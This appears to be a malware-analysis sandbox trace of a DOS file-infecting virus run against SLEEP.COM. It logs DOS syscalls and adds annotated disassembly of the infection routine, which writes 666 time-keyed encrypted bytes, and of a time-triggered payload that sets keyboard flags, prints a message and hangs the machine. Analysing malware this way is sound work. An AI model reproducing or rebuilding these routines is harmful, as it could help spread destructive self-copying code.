2018-12-25T12:54:38.235424591Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.242221714Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.243811303Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.252838181Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.264598003Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.267551746Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.268910814Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.275456831Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.2976636Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.303344634Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.306554129Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.314064643Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.315589979Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.318996005Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.328473934Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.330449572Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.339007009Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.342494404Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.35168268Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.363101529Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.367573146Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.369859753Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.376903782Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.38868939Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.396397322Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.399161117Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.407464164Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.410305754Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.418588265Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.430704069Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.434278449Z 78 PC: 12c66 | Find first file
2018-12-25T12:54:38.441080617Z 78 PC: 12c66 | Find first file (See above)
2018-12-25T12:54:38.448682845Z 78 PC: 12bf7 | Find first file
2018-12-25T12:54:38.455175322Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
; Window at the return from INT 21h "Get time" (its first instruction, 0x12d19: cmp ch, cl, is fused onto the log line above).
; Per the DOS Get Time convention CH = hour and CL = minute, so the je below appears to gate the payload on hour == minute
; (register values are not shown; confirm). In this run the trace next logs op 9 (Display string) at PC 12d37, so the payload path was taken.
0x12d1b: je 0x12d1e                        ; equal -> payload path
0x12d1d: ret                               ; otherwise return quietly
0x12d1e: push ds
0x12d1f: xor ax, ax
0x12d21: mov ds, ax                        ; DS = 0 to address low memory
0x12d23: mov byte ptr [0x417], 0x70        ; 0000:0417 is the BIOS keyboard-flags byte; 0x70 sets the Scroll/Num/Caps Lock state bits
0x12d28: mov ah, 1
0x12d2a: int 0x16                          ; BIOS keyboard status check; presumably makes the BIOS apply the new lock state (confirm)
0x12d2c: pop ds
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218                     ; DX = DI + 0x218: address of the message text
0x12d33: mov ah, 9
0x12d35: int 0x21                          ; DOS display-string call; its return address is 0x12d37
0x12d37: cli
0x12d38: hlt                               ; halt with interrupts masked: the machine hangs until reset (or an NMI)
0x12d39: dec ax                            ; NOTE(review): nothing runs past the hlt; these look like data decoded as code.
0x12d3a: insb byte ptr es:[di], dx         ; The address gap 0x12d3c -> 0x12d3e implies a prefix byte, and the one-byte
0x12d3c: popaw                             ; opcodes 48 / 6C / 61 are ASCII 'H' / 'l' / 'a', consistent with the text "Helga" (unconfirmed).
0x12d3e: add word ptr [bx], di
2018-12-25T12:54:38.471766365Z 9 PC: 12d37 | Display string (String= ' �� ����� ������� ����? �������-�������? �� ����� ������� ����? �������� ��� �� ����!')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":17008,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:37.747669405Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:54:37.750044047Z 78 PC: 12b17 | Find first file
2018-12-25T12:54:37.756790307Z 47 PC: 12b1d | Get disk transfer address
2018-12-25T12:54:37.758097913Z 67 PC: 12ca3 | Get or set file attributes
2018-12-25T12:54:37.764988547Z 67 PC: 12cab | Get or set file attributes
2018-12-25T12:54:37.788114256Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:37.793029215Z 87 PC: 12cb8 | Get or set file date and time
2018-12-25T12:54:37.794311658Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:37.800171793Z 66 PC: 12b79 | Move file pointer
2018-12-25T12:54:37.801690521Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Window at the return from INT 21h "Get time" (its first instruction, 0x12ace: xor cx, dx, is fused onto the log line above).
; Per the DOS Get Time convention CX/DX hold the clock fields on return, so the byte stored below is time-derived.
0x12ad0: xor ch, cl                        ; fold the mixed clock bytes into CH
0x12ad2: mov byte ptr [di + 0x10], ch      ; save that byte at [di+0x10]; presumably a per-write key/seed (confirm against the call target)
0x12ad5: call 0x22aae                      ; NOTE(review): printed target lies outside this 0x12xxx range; with 16-bit IP wraparound it would be 0x12aae (confirm)
0x12ad8: pop bx                            ; stack cleanup/restore; the matching pushes are outside this window
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]         ; DOS function number is read from data, not an immediate; the trace logs this call as op 64 (Write)
0x12add: mov cx, 0x29a                     ; CX = 0x29a = 666 bytes, the length the trace reports for this write
0x12ae0: nop
0x12ae1: mov dx, di                        ; DX = DI: the buffer written starts at DI
0x12ae3: int 0x21                          ; logged in the trace with PC 12ae5 (the return address)
0x12ae5: pushaw                            ; save registers around the second call
0x12ae6: call 0x22aae                      ; same target as at 0x12ad5; calling it before and after the write looks like transform-then-restore (unconfirmed)
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret                               ; end of this routine
0x12aec: xchg si, di                       ; follows the ret, so it is not fall-through from the routine above
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-25T12:54:37.803463127Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:54:37.810195907Z 66 PC: 12b97 | Move file pointer
2018-12-25T12:54:37.811849592Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:37.827727825Z 87 PC: 12bc0 | Get or set file date and time
2018-12-25T12:54:37.830887426Z 62 PC: 12bc6 | Close file
2018-12-25T12:54:37.842967564Z 67 PC: 12bcd | Get or set file attributes
2018-12-25T12:54:37.854951759Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.858772218Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.860146002Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.86729995Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.878570772Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.886493952Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.888452712Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.896640227Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.899852256Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.903029591Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:37.912621295Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:37.915716459Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:37.922953564Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:37.924624296Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:37.933737164Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:37.945225911Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.948518126Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.950549103Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.957203781Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.968813051Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.977227106Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.979299472Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.987029265Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.989355931Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.993436223Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.003076708Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.005093112Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.013665773Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.015528455Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.024603743Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.039728949Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.0443155Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.046016848Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.053959986Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.066282448Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.074257887Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.076750812Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.084330799Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.086168462Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.089487977Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.099708283Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.101486256Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.11278959Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.115082349Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.124525058Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.136878495Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.140477458Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.1420957Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.16307803Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.174129042Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.182033475Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.18396596Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.192102483Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.193771292Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.199474231Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.21064951Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.212448374Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.219822783Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.222836433Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.232459571Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.243603622Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.246940139Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.249711293Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.256519683Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.267712886Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.276657551Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.278527257Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.286012976Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.289440706Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.29213956Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.302368254Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.304781991Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.310299337Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.311967199Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.324176441Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.335630493Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.33893766Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.340840953Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.348527577Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.360007923Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.367286869Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.37065513Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.378148988Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.379901275Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.384179777Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.393698687Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.395702102Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.404332014Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.406797475Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.416530443Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.429002798Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.432781189Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.434469812Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.441169492Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.454011614Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.461823639Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.463796921Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.468174188Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.470249478Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.479253324Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.495181895Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.498652977Z 78 PC: 12c66 | Find first file
2018-12-25T12:54:38.505463981Z 78 PC: 12c66 | Find first file (See above)
2018-12-25T12:54:38.513127829Z 78 PC: 12bf7 | Find first file
2018-12-25T12:54:38.520239224Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
; Disassembly window around the DOS "Get time" call (int 21h, function 2Ch) traced at PC 12d19.
; Get time returns CH = hour and CL = minute; the compare on the log line above (cmp ch, cl)
; therefore selects the moment when the hour value equals the minute value.
; In this run the next logged call is "Set disk transfer address" at PC 12b36, not
; "Display string", so the ret path below was presumably taken.
0x12d1b: je 0x12d1e                          ; CH == CL: fall into the routine at 0x12d1e
0x12d1d: ret                                 ; otherwise return, nothing else happens here
0x12d1e: push ds                             ; save DS before pointing it at low memory
0x12d1f: xor ax, ax
0x12d21: mov ds, ax                          ; DS = 0
0x12d23: mov byte ptr [0x417], 0x70          ; 0000:0417 = BIOS keyboard flag byte; 0x70 marks Scroll/Num/Caps Lock active
0x12d28: mov ah, 1
0x12d2a: int 0x16                            ; BIOS keyboard service 01h (keystroke status); its result is not used in the visible code
0x12d2c: pop ds                              ; restore DS
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218                       ; DX = DI + 0x218, offset of the message text
0x12d33: mov ah, 9
0x12d35: int 0x21                            ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12d37: cli                                 ; interrupts off ...
0x12d38: hlt                                 ; ... then halt: the machine stays hung until reset
; NOTE(review): control does not continue past cli/hlt, so the lines below are probably
; data decoded as instructions. The usual encodings of these mnemonics (48 65 6C 67 61)
; would read "Helga" as ASCII; confirm against the raw bytes.
0x12d39: dec ax
0x12d3a: insb byte ptr es:[di], dx
0x12d3c: popaw
0x12d3e: add word ptr [bx], di
2018-12-25T12:54:38.522987963Z 26 PC: 12b36 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17008,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:37.861324221Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:54:37.862407853Z 78 PC: 12b17 | Find first file
2018-12-25T12:54:37.867888755Z 47 PC: 12b1d | Get disk transfer address
2018-12-25T12:54:37.875266269Z 67 PC: 12ca3 | Get or set file attributes
2018-12-25T12:54:37.879134514Z 67 PC: 12cab | Get or set file attributes
2018-12-25T12:54:37.893953077Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:37.902730766Z 87 PC: 12cb8 | Get or set file date and time
2018-12-25T12:54:37.904558981Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:37.909600432Z 66 PC: 12b79 | Move file pointer
2018-12-25T12:54:37.911695138Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
; Disassembly window around the DOS "Get time" call traced at PC 12ace; the first
; instruction of the window (xor cx, dx) is on the log line above.
; Get time returns CH/CL = hour/minute and DH/DL = second/hundredths, so the two XORs
; fold the current time into a single byte in CH.
0x12ad0: xor ch, cl                          ; CH = time-derived byte
0x12ad2: mov byte ptr [di + 0x10], ch        ; stored at [di+0x10]; presumably a per-copy key for the routine called next, confirm there
0x12ad5: call 0x22aae                        ; NOTE(review): target not in this window; for a 16-bit near call the printed address likely wraps to 0x12aae, confirm
0x12ad8: pop bx
0x12ad9: popaw                               ; restore general registers (the matching pushaw is outside this window)
0x12ada: mov ah, byte ptr [di + 9]           ; DOS function number is read from data, not an immediate; the log records function 64 (write) here
0x12add: mov cx, 0x29a                       ; length = 0x29a = 666 bytes, matching the logged write size
0x12ae0: nop
0x12ae1: mov dx, di                          ; buffer = DS:DI
0x12ae3: int 0x21                            ; logged as "Write file or device" at PC 12ae5
0x12ae5: pushaw
0x12ae6: call 0x22aae                        ; same routine again after the write; presumably reverses the transform applied before it (TODO confirm)
0x12ae9: pop bx                              ; stack balance here depends on the called routine, which is not shown
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di                         ; code past the ret belongs to another routine whose entry is not shown
0x12aee: pop si                              ; NOTE(review): pop si / sub si, 6 / push si looks like a run-time base-address
0x12aef: sub si, 6                           ;   computation from a return address, confirm against the caller
0x12af2: push si
2018-12-25T12:54:37.913769415Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:54:37.920296011Z 66 PC: 12b97 | Move file pointer
2018-12-25T12:54:37.921566291Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:37.927277752Z 87 PC: 12bc0 | Get or set file date and time
2018-12-25T12:54:37.928661768Z 62 PC: 12bc6 | Close file
2018-12-25T12:54:37.934817946Z 67 PC: 12bcd | Get or set file attributes
2018-12-25T12:54:37.942566009Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.945864052Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.947601822Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.956456919Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.967995587Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.983071683Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.98566249Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.994200284Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.996278278Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.998978361Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.009126246Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.010739517Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.020115054Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.022789223Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.032842555Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.044028455Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.048351347Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.050554608Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.05816598Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.071104832Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.078908782Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.080877867Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.100157548Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.102065751Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.10500196Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.115597149Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.118108979Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.125963684Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.128132007Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.138715825Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.150158747Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.153541326Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.156240249Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.163044703Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.174344841Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.182693149Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.184696062Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.192394939Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.195202313Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.199172254Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.208592123Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.219849673Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.230188856Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.232062848Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.241824319Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.253054063Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.256435751Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.258025895Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.265364994Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.277116884Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.295986231Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.298379488Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.305978423Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.308138618Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.312181242Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.323976989Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.32588482Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.334607201Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.336764476Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.346273762Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.358552704Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.362067078Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.363591871Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.37049588Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.382337239Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.390083953Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.392087599Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.400868757Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.402854872Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.406692254Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.417995895Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.420352479Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.428332537Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.431223732Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.440726754Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.452066269Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.455103978Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.457661394Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.464559606Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.477233908Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.486133448Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.488086545Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.495659578Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.501874789Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.506204628Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.515848363Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.518665376Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.526742481Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.52883275Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.539120217Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.550763782Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.554509609Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.556216289Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.563921882Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.574714831Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.582525428Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.585548164Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.593086159Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.595187721Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.607171772Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.618698397Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.621798272Z 78 PC: 12c66 | Find first file
2018-12-25T12:54:38.62933397Z 78 PC: 12c66 | Find first file (See above)
2018-12-25T12:54:38.636608691Z 78 PC: 12bf7 | Find first file
2018-12-25T12:54:38.640521796Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
; Disassembly window around the DOS "Get time" call (int 21h, function 2Ch) traced at PC 12d19.
; Get time returns CH = hour and CL = minute; the compare on the log line above (cmp ch, cl)
; therefore selects the moment when the hour value equals the minute value.
; In this run the next logged call is "Display string" at PC 12d37, i.e. the branch
; to 0x12d1e was taken and the int 21h at 0x12d35 executed.
0x12d1b: je 0x12d1e                          ; CH == CL: fall into the routine at 0x12d1e
0x12d1d: ret                                 ; otherwise return, nothing else happens here
0x12d1e: push ds                             ; save DS before pointing it at low memory
0x12d1f: xor ax, ax
0x12d21: mov ds, ax                          ; DS = 0
0x12d23: mov byte ptr [0x417], 0x70          ; 0000:0417 = BIOS keyboard flag byte; 0x70 marks Scroll/Num/Caps Lock active
0x12d28: mov ah, 1
0x12d2a: int 0x16                            ; BIOS keyboard service 01h (keystroke status); its result is not used in the visible code
